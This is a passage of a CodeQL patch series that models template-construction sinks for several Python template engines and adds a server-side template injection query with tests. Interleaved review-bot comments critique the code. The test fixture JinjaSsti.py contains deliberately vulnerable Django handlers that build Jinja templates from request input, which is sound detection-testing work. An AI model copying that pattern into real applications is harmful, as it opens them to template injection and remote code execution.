+ this = API::moduleImport("jinja2").getMember("Template").getACall()
+ }
+
+ override DataFlow::Node getSourceArg() { result = this.getArg(0) }
+ }
+
+ module EnvironmentClass {
+ /** Gets a reference to the `jinja2.Environment` class. */
+ API::Node classRef() {
+ result = API::moduleImport("jinja2").getMember("Environment")
+ or
+ result = ModelOutput::getATypeNode("jinja.Environment~Subclass").getASubclass*()
+ }
+
+ /** Gets a reference to an instance of `jinja2.Environment`. */
+ private DataFlow::TypeTrackingNode instance(DataFlow::TypeTracker t) {
+ t.start() and
+ result = EnvironmentClass::classRef().getACall()
+ or
+ exists(DataFlow::TypeTracker t2 | result = instance(t2).track(t2, t))
+ }
+
+ /** Gets a reference to an instance of `jinja2.Environment`. */
+ DataFlow::Node instance() { instance(DataFlow::TypeTracker::end()).flowsTo(result) }
+
+ /** A call to `jinja2.Environment.from_string`. */
+ class Jinja2FromStringConstruction extends TemplateConstruction::Range, DataFlow::MethodCallNode
+ {
+ Jinja2FromStringConstruction() { this.calls(EnvironmentClass::instance(), "from_string") }
+
+ override DataFlow::Node getSourceArg() { result = this.getArg(0) }
+ }
+ }
+}
diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll b/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll
index b4f5cae4449..5144e2ff97b 100644
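Review bot: In `EnvironmentClass::classRef()`, the type name passed to `ModelOutput::getATypeNode` is `"jinja.Environment~Subclass"`, while every other reference in this file names the package `jinja2`. Unless a model file defines that exact spelling, subclasses of `Environment` supplied through models-as-data will not be resolved, and `from_string` calls on them are missed as template-injection sinks. The likely intent is `result = ModelOutput::getATypeNode("jinja2.Environment~Subclass").getASubclass*()`.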
--- a/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll +++ b/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll @@ -122,6 +122,7 @@ class GenshiMarkupTemplateConstruction extends TemplateConstruction::Range, API: override DataFlow::Node getSourceArg() { result = this.getArg(0) } } +// /** A call to `jinja2.Template`. */ class Jinja2TemplateConstruction extends TemplateConstruction::Range, API::CallNode { Jinja2TemplateConstruction() { From b2c13fe351894553b1e367c497a57ee10b5f3dc2 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Wed, 6 Nov 2024 16:13:36 +0000 Subject: [PATCH 0941/1267] Promote template injection sinks for each framework covered `Cheetah` was excluded as it was last updated 15 years ago and its documentation links are dead. --- python/ql/lib/semmle/python/Frameworks.qll | 8 ++++ .../lib/semmle/python/frameworks/Airspeed.qll | 26 +++++++++++ .../lib/semmle/python/frameworks/Bottle.qll | 14 +++++- .../semmle/python/frameworks/Chameleon.qll | 26 +++++++++++ .../lib/semmle/python/frameworks/Chevron.qll | 26 +++++++++++ .../lib/semmle/python/frameworks/Django.qll | 15 +++++++ .../ql/lib/semmle/python/frameworks/Flask.qll | 9 ++++ .../lib/semmle/python/frameworks/Genshi.qll | 45 +++++++++++++++++++ .../lib/semmle/python/frameworks/Jinja2.qll | 11 ++++- .../ql/lib/semmle/python/frameworks/Mako.qll | 26 +++++++++++ .../lib/semmle/python/frameworks/TRender.qll | 26 +++++++++++ 11 files changed, 229 insertions(+), 3 deletions(-) create mode 100644 python/ql/lib/semmle/python/frameworks/Airspeed.qll create mode 100644 python/ql/lib/semmle/python/frameworks/Chameleon.qll create mode 100644 python/ql/lib/semmle/python/frameworks/Chevron.qll create mode 100644 python/ql/lib/semmle/python/frameworks/Genshi.qll create mode 100644 python/ql/lib/semmle/python/frameworks/Mako.qll create mode 100644 python/ql/lib/semmle/python/frameworks/TRender.qll 
diff --git a/python/ql/lib/semmle/python/Frameworks.qll b/python/ql/lib/semmle/python/Frameworks.qll index da35994b955..af9417308ab 100644 --- a/python/ql/lib/semmle/python/Frameworks.qll +++ b/python/ql/lib/semmle/python/Frameworks.qll @@ -11,13 +11,17 @@ private import semmle.python.frameworks.Aiohttp private import semmle.python.frameworks.Aiomysql private import semmle.python.frameworks.Aiopg private import semmle.python.frameworks.Aiosqlite +private import semmle.python.frameworks.Airspeed private import semmle.python.frameworks.Anyio private import semmle.python.frameworks.Asyncpg private import semmle.python.frameworks.Baize +private import semmle.python.frameworks.Bottle private import semmle.python.frameworks.BSon private import semmle.python.frameworks.Bottle private import semmle.python.frameworks.CassandraDriver +private import semmle.python.frameworks.Chameleon private import semmle.python.frameworks.Cherrypy +private import semmle.python.frameworks.Chevron private import semmle.python.frameworks.ClickhouseDriver private import semmle.python.frameworks.Cryptodome private import semmle.python.frameworks.Cryptography @@ -30,10 +34,12 @@ private import semmle.python.frameworks.FastApi private import semmle.python.frameworks.Flask private import semmle.python.frameworks.FlaskAdmin private import semmle.python.frameworks.FlaskSqlAlchemy +private import semmle.python.frameworks.Genshi private import semmle.python.frameworks.Gradio private import semmle.python.frameworks.Httpx private import semmle.python.frameworks.Idna private import semmle.python.frameworks.Invoke +private import semmle.python.frameworks.Jinja2 private import semmle.python.frameworks.Jmespath private import semmle.python.frameworks.Joblib private import semmle.python.frameworks.JsonPickle 
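Review bot: The first hunk adds `private import semmle.python.frameworks.Bottle` above `BSon`, but the same import is already present two lines further down as context, so the module is now imported twice. The duplicate does not change evaluation, but this list is the index of which framework models are active and should stay unambiguous. Drop the added line and keep the existing one.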
@@ -42,6 +48,7 @@ private import semmle.python.frameworks.Ldap3
 private import semmle.python.frameworks.Libtaxii
 private import semmle.python.frameworks.Libxml2
 private import semmle.python.frameworks.Lxml
+private import semmle.python.frameworks.Mako
 private import semmle.python.frameworks.MarkupSafe
 private import semmle.python.frameworks.Multidict
 private import semmle.python.frameworks.Mysql
@@ -78,6 +85,7 @@ private import semmle.python.frameworks.Streamlit
 private import semmle.python.frameworks.Toml
 private import semmle.python.frameworks.Torch
 private import semmle.python.frameworks.Tornado
+private import semmle.python.frameworks.TRender
 private import semmle.python.frameworks.Twisted
 private import semmle.python.frameworks.Ujson
 private import semmle.python.frameworks.Urllib3
diff --git a/python/ql/lib/semmle/python/frameworks/Airspeed.qll b/python/ql/lib/semmle/python/frameworks/Airspeed.qll
new file mode 100644
index 00000000000..bdfc2ae357d
--- /dev/null
+++ b/python/ql/lib/semmle/python/frameworks/Airspeed.qll
@@ -0,0 +1,26 @@
+/**
+ * Provides classes modeling security-relevant aspects of the `airspeed` library.
+ * See https://github.com/purcell/airspeed.
+ */
+
+private import python
+private import semmle.python.dataflow.new.DataFlow
+private import semmle.python.ApiGraphs
+private import semmle.python.Concepts
+
+/**
+ * INTERNAL: Do not use.
+ *
+ * Provides classes modeling security-relevant aspects of the `airspeed` library.
+ * See https://github.com/purcell/airspeed.
+ */
+module Airspeed {
+ /** A call to `airspeed.Template`. */
+ private class AirspeedTemplateConstruction extends TemplateConstruction::Range, API::CallNode {
+ AirspeedTemplateConstruction() {
+ this = API::moduleImport("airspeed").getMember("Template").getACall()
+ }
+
+ override DataFlow::Node getSourceArg() { result = this.getArg(0) }
+ }
+}
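Review bot: `getSourceArg()` in `AirspeedTemplateConstruction` returns only `this.getArg(0)`, so a call that passes the template text by keyword is not a sink, and tainted input reaching it goes unreported. The same pattern recurs in the Bottle, Chameleon, Chevron, Django, Flask, Genshi, Mako and TRender models added in this commit; Mako's `Template(text=...)` is a common spelling that would be missed. Consider `result in [this.getArg(0), this.getArgByName("<source parameter name>")]`, filling in each library's actual parameter name.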
diff --git a/python/ql/lib/semmle/python/frameworks/Bottle.qll b/python/ql/lib/semmle/python/frameworks/Bottle.qll index ce2a41dbaf4..c03ea3df184 100644 --- a/python/ql/lib/semmle/python/frameworks/Bottle.qll +++ b/python/ql/lib/semmle/python/frameworks/Bottle.qll @@ -39,7 +39,7 @@ module Bottle { ViewCallable() { this = any(BottleRouteSetup rs).getARequestHandler() } } - /** Get methods that reprsent a route in Bottle */ + /** Get methods that represent a route in Bottle */ string routeMethods() { result = ["route", "get", "post", "put", "delete", "patch"] } private class BottleRouteSetup extends Http::Server::RouteSetup::Range, DataFlow::CallCfgNode { @@ -171,5 +171,17 @@ module Bottle { override predicate valueAllowsNewline() { none() } } } + + /** Provides models for functions that construct templates. */ + module Templates { + /** A call to `bottle.template`or `bottle.SimpleTemplate`. */ + private class BottleTemplateConstruction extends TemplateConstruction::Range, API::CallNode { + BottleTemplateConstruction() { + this = API::moduleImport("bottle").getMember(["template", "SimpleTemplate"]).getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } + } } } diff --git a/python/ql/lib/semmle/python/frameworks/Chameleon.qll b/python/ql/lib/semmle/python/frameworks/Chameleon.qll new file mode 100644 index 00000000000..2f86d784b96 --- /dev/null +++ b/python/ql/lib/semmle/python/frameworks/Chameleon.qll 
@@ -0,0 +1,26 @@
+/**
+ * Provides classes modeling security-relevant aspects of the `chameleon` PyPI package.
+ * See https://chameleon.readthedocs.io/en/latest/.
+ */
+
+private import python
+private import semmle.python.dataflow.new.DataFlow
+private import semmle.python.ApiGraphs
+private import semmle.python.Concepts
+
+/**
+ * INTERNAL: Do not use.
+ *
+ * Provides classes modeling security-relevant aspects of the `chameleon` PyPI package.
+ * See https://chameleon.readthedocs.io/en/latest/.
+ */
+module Chameleon {
+ /** A call to `chameleon.PageTemplate`. */
+ private class ChameleonTemplateConstruction extends TemplateConstruction::Range, API::CallNode {
+ ChameleonTemplateConstruction() {
+ this = API::moduleImport("chameleon").getMember("PageTemplate").getACall()
+ }
+
+ override DataFlow::Node getSourceArg() { result = this.getArg(0) }
+ }
+}
diff --git a/python/ql/lib/semmle/python/frameworks/Chevron.qll b/python/ql/lib/semmle/python/frameworks/Chevron.qll
new file mode 100644
index 00000000000..5d938fef208
--- /dev/null
+++ b/python/ql/lib/semmle/python/frameworks/Chevron.qll
@@ -0,0 +1,26 @@
+/**
+ * Provides classes modeling security-relevant aspects of the `chevron` PyPI package.
+ * See https://pypi.org/project/chevron.
+ */
+
+private import python
+private import semmle.python.dataflow.new.DataFlow
+private import semmle.python.ApiGraphs
+private import semmle.python.Concepts
+
+/**
+ * INTERNAL: Do not use.
+ *
+ * Provides classes modeling security-relevant aspects of the `chevron` PyPI package.
+ * See https://pypi.org/project/chevron.
+ */
+module Chevron {
+ /** A call to `chevron.render`. */
+ private class ChevronRenderConstruction extends TemplateConstruction::Range, API::CallNode {
+ ChevronRenderConstruction() {
+ this = API::moduleImport("chevron").getMember("render").getACall()
+ }
+
+ override DataFlow::Node getSourceArg() { result = this.getArg(0) }
+ }
+}
diff --git a/python/ql/lib/semmle/python/frameworks/Django.qll b/python/ql/lib/semmle/python/frameworks/Django.qll index 351420818c3..80ef4aef435 100644 --- a/python/ql/lib/semmle/python/frameworks/Django.qll +++ b/python/ql/lib/semmle/python/frameworks/Django.qll @@ -2996,4 +2996,19 @@ module PrivateDjango { any() } } + + // --------------------------------------------------------------------------- + // Templates + // --------------------------------------------------------------------------- + + /** A call to `django.template.Template` */ + private class DjangoTemplateConstruction extends TemplateConstruction::Range, API::CallNode { + DjangoTemplateConstruction() { + this = API::moduleImport("django").getMember("template").getMember("Template").getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } + + // TODO: Support `from_string` on instances of `django.template.Engine`. } diff --git a/python/ql/lib/semmle/python/frameworks/Flask.qll b/python/ql/lib/semmle/python/frameworks/Flask.qll index 62722a1958a..cfb8048c6a1 100644 --- a/python/ql/lib/semmle/python/frameworks/Flask.qll +++ b/python/ql/lib/semmle/python/frameworks/Flask.qll @@ -721,4 +721,13 @@ module Flask { preservesValue = false } } + + /** A call to `flask.render_template_string` as a template construction sink. */ + private class FlaskTemplateConstruction extends TemplateConstruction::Range, API::CallNode { + FlaskTemplateConstruction() { + this = API::moduleImport("flask").getMember("render_template_string").getACall() + } + + override DataFlow::Node getSourceArg() { result = this.getArg(0) } + } } diff --git a/python/ql/lib/semmle/python/frameworks/Genshi.qll b/python/ql/lib/semmle/python/frameworks/Genshi.qll new file mode 100644 index 00000000000..f01b5137aac --- /dev/null +++ b/python/ql/lib/semmle/python/frameworks/Genshi.qll 
@@ -0,0 +1,45 @@
+/**
+ * Provides classes modeling security-relevant aspects of the `Genshi` PyPI package.
+ * See https://genshi.edgewall.org/.
+ */
+
+private import python
+private import semmle.python.dataflow.new.DataFlow
+private import semmle.python.ApiGraphs
+private import semmle.python.Concepts
+
+/**
+ * INTERNAL: Do not use.
+ *
+ * Provides classes modeling security-relevant aspects of the `Genshi` PyPI package.
+ * See https://genshi.edgewall.org/.
+ */
+module Genshi {
+ /** A call to `genshi.template.text.NewTextTemplate` or `genshi.template.text.OldTextTemplate`. */
+ private class GenshiTextTemplateConstruction extends TemplateConstruction::Range, API::CallNode {
+ GenshiTextTemplateConstruction() {
+ this =
+ API::moduleImport("genshi")
+ .getMember("template")
+ .getMember("text")
+ .getMember(["NewTextTemplate", "OldTextTemplate"])
+ .getACall()
+ }
+
+ override DataFlow::Node getSourceArg() { result = this.getArg(0) }
+ }
+
+ /** A call to `genshi.template.MarkupTemplate` */
+ private class GenshiMarkupTemplateConstruction extends TemplateConstruction::Range, API::CallNode {
+ GenshiMarkupTemplateConstruction() {
+ this =
+ API::moduleImport("genshi")
+ .getMember("template")
+ .getMember("markup")
+ .getMember("MarkupTemplate")
+ .getACall()
+ }
+
+ override DataFlow::Node getSourceArg() { result = this.getArg(0) }
+ }
+}
diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll
index 0b681820f13..c89ffbe3cc9 100644
--- a/python/ql/lib/semmle/python/frameworks/Jinja2.qll
+++ b/python/ql/lib/semmle/python/frameworks/Jinja2.qll
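Review bot: `GenshiMarkupTemplateConstruction` matches the path `genshi.template.markup.MarkupTemplate`, while its QLDoc names `genshi.template.MarkupTemplate`. `GenshiTextTemplateConstruction` likewise matches only the `genshi.template.text` submodule path. Genshi re-exports these classes from `genshi.template`, and `from genshi.template import MarkupTemplate` is the usual import, so calls written that way would probably not be recognised as sinks. Consider accepting the package-level path as well, e.g. `API::moduleImport("genshi").getMember("template").getMember("MarkupTemplate").getACall()` alongside the submodule form, and make the comment list whichever paths are modelled.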
@@ -9,9 +9,15 @@ private import semmle.python.ApiGraphs private import semmle.python.Concepts private import semmle.python.frameworks.data.ModelsAsData +/** + * INTERNAL: Do not use + * + * Provides classes modeling security-relevant aspects of the `jinja2` PyPI package. + * See https://jinja.palletsprojects.com. + */ module Jinja2 { /** A call to `jinja2.Template`. */ - class Jinja2TemplateConstruction extends TemplateConstruction::Range, API::CallNode { + private class Jinja2TemplateConstruction extends TemplateConstruction::Range, API::CallNode { Jinja2TemplateConstruction() { this = API::moduleImport("jinja2").getMember("Template").getACall() } @@ -39,7 +45,8 @@ module Jinja2 { DataFlow::Node instance() { instance(DataFlow::TypeTracker::end()).flowsTo(result) } /** A call to `jinja2.Environment.from_string`. */ - class Jinja2FromStringConstruction extends TemplateConstruction::Range, DataFlow::MethodCallNode + private class Jinja2FromStringConstruction extends TemplateConstruction::Range, + DataFlow::MethodCallNode { Jinja2FromStringConstruction() { this.calls(EnvironmentClass::instance(), "from_string") } diff --git a/python/ql/lib/semmle/python/frameworks/Mako.qll b/python/ql/lib/semmle/python/frameworks/Mako.qll new file mode 100644 index 00000000000..5dd518a8afe --- /dev/null +++ b/python/ql/lib/semmle/python/frameworks/Mako.qll 
@@ -0,0 +1,26 @@
+/**
+ * Provides classes modeling security-relevant aspects of the `Mako` PyPI package.
+ * See https://www.makotemplates.org/.
+ */
+
+private import python
+private import semmle.python.dataflow.new.DataFlow
+private import semmle.python.ApiGraphs
+private import semmle.python.Concepts
+
+/**
+ * INTERNAL: Do not use.
+ *
+ * Provides classes modeling security-relevant aspects of the `Mako` PyPI package.
+ * See https://www.makotemplates.org/.
+ */
+module Mako {
+ /** A call to `mako.template.Template`. */
+ private class MakoTemplateConstruction extends TemplateConstruction::Range, API::CallNode {
+ MakoTemplateConstruction() {
+ this = API::moduleImport("mako").getMember("template").getMember("Template").getACall()
+ }
+
+ override DataFlow::Node getSourceArg() { result = this.getArg(0) }
+ }
+}
diff --git a/python/ql/lib/semmle/python/frameworks/TRender.qll b/python/ql/lib/semmle/python/frameworks/TRender.qll
new file mode 100644
index 00000000000..08749676a06
--- /dev/null
+++ b/python/ql/lib/semmle/python/frameworks/TRender.qll
@@ -0,0 +1,26 @@
+/**
+ * Provides classes modeling security-relevant aspects of the `trender` PyPI package.
+ * See https://github.com/cesbit/trender.
+ */
+
+private import python
+private import semmle.python.dataflow.new.DataFlow
+private import semmle.python.ApiGraphs
+private import semmle.python.Concepts
+
+/**
+ * INTERNAL: Do not use.
+ *
+ * Provides classes modeling security-relevant aspects of the `trender` PyPI package.
+ * See https://github.com/cesbit/trender.
+ */
+module TRender {
+ /** A call to `trender.TRender`. */
+ private class TRenderTemplateConstruction extends TemplateConstruction::Range, API::CallNode {
+ TRenderTemplateConstruction() {
+ this = API::moduleImport("trender").getMember("TRender").getACall()
+ }
+
+ override DataFlow::Node getSourceArg() { result = this.getArg(0) }
+ }
+}
From 71ab82dee06a4252c64e650c76773133cfc8d9e1 Mon Sep 17 00:00:00 2001
From: Joe Farebrother Date: Thu, 7 Nov 2024 14:40:51 +0000 Subject: [PATCH 0942/1267] Fix qldoc, formatting, and redundant import warnings --- python/ql/lib/semmle/python/Concepts.qll | 3 +-- python/ql/lib/semmle/python/frameworks/Airspeed.qll | 1 - python/ql/lib/semmle/python/frameworks/Chameleon.qll | 1 - python/ql/lib/semmle/python/frameworks/Chevron.qll | 1 - python/ql/lib/semmle/python/frameworks/Django.qll | 2 -- python/ql/lib/semmle/python/frameworks/Genshi.qll | 1 - python/ql/lib/semmle/python/frameworks/Jinja2.qll | 1 - python/ql/lib/semmle/python/frameworks/Mako.qll | 1 - python/ql/lib/semmle/python/frameworks/TRender.qll | 1 - .../semmle/python/security/dataflow/TemplateInjectionQuery.qll | 3 ++- 10 files changed, 3 insertions(+), 12 deletions(-) diff --git a/python/ql/lib/semmle/python/Concepts.qll b/python/ql/lib/semmle/python/Concepts.qll index cf6f0214496..94d660d7510 100644 --- a/python/ql/lib/semmle/python/Concepts.qll +++ b/python/ql/lib/semmle/python/Concepts.qll @@ -872,7 +872,7 @@ class TemplateConstruction extends DataFlow::Node instanceof TemplateConstructio DataFlow::Node getSourceArg() { result = super.getSourceArg() } } -/** Provides classes for modelling template construction APIs. */ +/** Provides classes for modeling template construction APIs. */ module TemplateConstruction { /** * A data-flow node that constructs a template in a templating engine. @@ -886,7 +886,6 @@ module TemplateConstruction { } } - /** Provides classes for modeling HTTP-related APIs. */ module Http { /** Gets an HTTP verb, in upper case */ diff --git a/python/ql/lib/semmle/python/frameworks/Airspeed.qll b/python/ql/lib/semmle/python/frameworks/Airspeed.qll index bdfc2ae357d..a08a1b4a46b 100644 --- a/python/ql/lib/semmle/python/frameworks/Airspeed.qll +++ b/python/ql/lib/semmle/python/frameworks/Airspeed.qll 
@@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts diff --git a/python/ql/lib/semmle/python/frameworks/Chameleon.qll b/python/ql/lib/semmle/python/frameworks/Chameleon.qll index 2f86d784b96..cf5444c40ce 100644 --- a/python/ql/lib/semmle/python/frameworks/Chameleon.qll +++ b/python/ql/lib/semmle/python/frameworks/Chameleon.qll @@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts diff --git a/python/ql/lib/semmle/python/frameworks/Chevron.qll b/python/ql/lib/semmle/python/frameworks/Chevron.qll index 5d938fef208..ec5676a2f04 100644 --- a/python/ql/lib/semmle/python/frameworks/Chevron.qll +++ b/python/ql/lib/semmle/python/frameworks/Chevron.qll @@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts diff --git a/python/ql/lib/semmle/python/frameworks/Django.qll b/python/ql/lib/semmle/python/frameworks/Django.qll index 80ef4aef435..4aa5776ad54 100644 --- a/python/ql/lib/semmle/python/frameworks/Django.qll +++ b/python/ql/lib/semmle/python/frameworks/Django.qll @@ -3000,7 +3000,6 @@ module PrivateDjango { // --------------------------------------------------------------------------- // Templates // --------------------------------------------------------------------------- - /** A call to `django.template.Template` */ private class DjangoTemplateConstruction extends TemplateConstruction::Range, API::CallNode { DjangoTemplateConstruction() { @@ -3009,6 +3008,5 @@ module PrivateDjango { override DataFlow::Node getSourceArg() { result = this.getArg(0) } } - // TODO: Support `from_string` on instances of `django.template.Engine`. } 
diff --git a/python/ql/lib/semmle/python/frameworks/Genshi.qll b/python/ql/lib/semmle/python/frameworks/Genshi.qll index f01b5137aac..1e29295b428 100644 --- a/python/ql/lib/semmle/python/frameworks/Genshi.qll +++ b/python/ql/lib/semmle/python/frameworks/Genshi.qll @@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts diff --git a/python/ql/lib/semmle/python/frameworks/Jinja2.qll b/python/ql/lib/semmle/python/frameworks/Jinja2.qll index c89ffbe3cc9..9f267915e5c 100644 --- a/python/ql/lib/semmle/python/frameworks/Jinja2.qll +++ b/python/ql/lib/semmle/python/frameworks/Jinja2.qll @@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts private import semmle.python.frameworks.data.ModelsAsData diff --git a/python/ql/lib/semmle/python/frameworks/Mako.qll b/python/ql/lib/semmle/python/frameworks/Mako.qll index 5dd518a8afe..2209c0f89d2 100644 --- a/python/ql/lib/semmle/python/frameworks/Mako.qll +++ b/python/ql/lib/semmle/python/frameworks/Mako.qll @@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts diff --git a/python/ql/lib/semmle/python/frameworks/TRender.qll b/python/ql/lib/semmle/python/frameworks/TRender.qll index 08749676a06..fae27f418c3 100644 --- a/python/ql/lib/semmle/python/frameworks/TRender.qll +++ b/python/ql/lib/semmle/python/frameworks/TRender.qll @@ -4,7 +4,6 @@ */ private import python -private import semmle.python.dataflow.new.DataFlow private import semmle.python.ApiGraphs private import semmle.python.Concepts diff --git a/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll b/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll index e5ad529fb37..22c228f48d5 100644 
--- a/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll +++ b/python/ql/lib/semmle/python/security/dataflow/TemplateInjectionQuery.qll @@ -11,7 +11,7 @@ import semmle.python.dataflow.new.DataFlow import semmle.python.dataflow.new.TaintTracking import TemplateInjectionCustomizations::TemplateInjection -module TemplateInjectionConfig implements DataFlow::ConfigSig { +private module TemplateInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node node) { node instanceof Source } predicate isSink(DataFlow::Node node) { node instanceof Sink } @@ -19,4 +19,5 @@ module TemplateInjectionConfig implements DataFlow::ConfigSig { predicate isBarrierIn(DataFlow::Node node) { node instanceof Sanitizer } } +/** Global taint-tracking for detecting "template injection" vulnerabilities. */ module TemplateInjectionFlow = TaintTracking::Global; From 1cb01a286d622d30a95077567fa42f02cd125669 Mon Sep 17 00:00:00 2001 From: Joe Farebrother Date: Wed, 20 Nov 2024 14:50:35 +0000 Subject: [PATCH 0943/1267] Add tests for jinja --- .../src/Security/CWE-074/TemplateInjection.ql | 19 ++++++++++++ .../CWE-074-TemplateInjection/JinjaSsti.py | 31 +++++++++++++++++++ .../TemplateInjection.expected | 16 ++++++++++ .../TemplateInjection.qlref | 1 + 4 files changed, 67 insertions(+) create mode 100644 python/ql/src/Security/CWE-074/TemplateInjection.ql create mode 100644 python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py create mode 100644 python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected create mode 100644 python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref diff --git a/python/ql/src/Security/CWE-074/TemplateInjection.ql b/python/ql/src/Security/CWE-074/TemplateInjection.ql new file mode 100644 index 00000000000..125478c801c --- /dev/null +++ b/python/ql/src/Security/CWE-074/TemplateInjection.ql 
@@ -0,0 +1,19 @@
+/**
+ * @name Server Side Template Injection
+ * @description Using user-controlled data to create a template can lead to remote code execution or cross site scripting.
+ * @kind path-problem
+ * @problem.severity error
+ * @precision high
+ * @id py/template-injection
+ * @tags security
+ * external/cwe/cwe-074
+ */
+
+import python
+import semmle.python.security.dataflow.TemplateInjectionQuery
+import TemplateInjectionFlow::PathGraph
+
+from TemplateInjectionFlow::PathNode source, TemplateInjectionFlow::PathNode sink
+where TemplateInjectionFlow::flowPath(source, sink)
+select sink.getNode(), source, sink, "This Template construction depends on $@.", source.getNode(),
+ "user-provided value"
diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py
new file mode 100644
index 00000000000..f1fe834e493
--- /dev/null
+++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py
@@ -0,0 +1,31 @@
+from django.urls import path
+from django.http import HttpResponse
+from jinja2 import Template
+from jinja2 import Environment, DictLoader, escape
+
+
+def a(request):
+ # Load the template
+ template = request.GET['template']
+ t = Template(template) # BAD: Template constructed from user input
+ name = request.GET['name']
+ # Render the template with the context data
+ html = t.render(name=escape(name))
+ return HttpResponse(html)
+
+def b(request):
+ import jinja2
+ # Load the template
+ template = request.GET['template']
+ env = Environment()
+ t = env.from_string(template) # BAD: Template constructed from user input
+ name = request.GET['name']
+ # Render the template with the context data
+ html = t.render(name=escape(name))
+ return HttpResponse(html)
+
+
+urlpatterns = [
+ path('a', a),
+ path('b', b)
+]
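Review bot: The query metadata carries `@tags security` but no `@security-severity`, the property code scanning uses to rank security alerts. Add a line of the form ` * @security-severity <score>`, where `<score>` is a placeholder to be set from the score agreed for this class of issue. CWE-074 is the general injection category; `external/cwe/cwe-1336` (template-engine injection) could be listed alongside it as the more specific tag. The alert text `"This Template construction depends on $@."` capitalises "Template" mid-sentence, which reads like a class name; lower-case it unless that is intended.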
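Review bot: Both handlers in this fixture are BAD cases, so the test pins only true positives and would not notice the query starting to flag safe uses. Add a GOOD handler whose template text is a constant and whose request value is passed only as render context, e.g. `t = Template("Hello {{ name }}")` followed by `html = t.render(name=escape(request.GET['name']))`. Then confirm that no new row appears in `TemplateInjection.expected`. `DictLoader` and the function-local `import jinja2` in `b` are unused and can be dropped.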
diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected new file mode 100644 index 00000000000..3a833787a98 --- /dev/null +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected 
@@ -0,0 +1,16 @@ +edges +| JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | +| JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | provenance | | +| JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | +| JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | provenance | | +nodes +| JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | +| JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | +| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | +| JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | +| JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | +| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | +subpaths +#select +| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This Template construction depends on $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | +| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This Template construction depends on $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | 
diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref new file mode 100644 index 00000000000..ead6bb469c6 --- /dev/null +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.qlref @@ -0,0 +1 @@ +Security/CWE-074/TemplateInjection.ql \ No newline at end of file From cea196ec61cec37fc47f526a88b4775a5a629d65 Mon Sep 17 00:00:00 2001 
